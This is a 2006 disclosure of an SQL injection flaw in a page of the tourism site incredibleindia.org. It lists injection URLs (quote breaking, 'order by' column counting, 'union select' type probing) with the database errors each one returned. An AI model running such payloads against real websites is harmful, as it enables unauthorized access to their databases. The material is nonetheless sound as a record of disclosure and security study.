Vulnerable Page: http://www.incredibleindia.org/newsite/cms_Page.asp Found By: Susam Pal Found On: 29th March, 2006, Wednesday Vulnerability Type: SQL Injection Action Taken: Reported to admin@xxxxxxxxxxxxxxxxxxx Description: www.incredibleindia.org is a tourism website. The site is prone to SQL injection which can be exploited to reveal the table names, some column names as well as their data types. Exploiting the vulnerability requires some reverse engineering. The ASP ODBC error messages can be displayed by passing bad values for the parameters in the URL. Example URL 1: http://www.incredibleindia.org/newsite/cms_Page.asp?PageID=828' Error Found: Unclosed quotation mark before the character string ' and mncpage.mnccategoryid = mnccategory.mnccategoryid'. Conclusion: Direct SQL Injection is possible. There are 2 tables, 'mncpage' and 'mnccategory'. Both of them have a column called 'mnccategoryid'. Example URL 2: http://www.incredibleindia.org/newsite/cms_Page.asp?PageID=828 order by 1-- Example URL 3: http://www.incredibleindia.org/newsite/cms_Page.asp?PageID=828 order by 2-- Example URL 4: http://www.incredibleindia.org/newsite/cms_Page.asp?PageID=828 order by 3-- Error Found: None Example URL 5: http://www.incredibleindia.org/newsite/cms_Page.asp?PageID=828 order by 4-- Error Found: The ORDER BY position number 4 is out of range of the number of items in the select list. Conclusion: The table being used by the query selects 3 columns and one of them is an integer. Example URL 6: http://www.incredibleindia.org/newsite/cms_Page.asp?PageID=828 union select 'varchar1', 'varchar2', 'varchar3' from mncpage-- Error Found: Syntax error converting the varchar value 'varchar1' to a column of data type int. Conclusion: The 1st column in the select query is an integer. Error URL 7: http://www.incredibleindia.org/newsite/cms_Page.asp?PageID=828 union select mnccategoryid, 'varchar2', 'varchar3' from mncpage-- Error Found: None Conclusion: The column 'mnccategory' is of integer type.
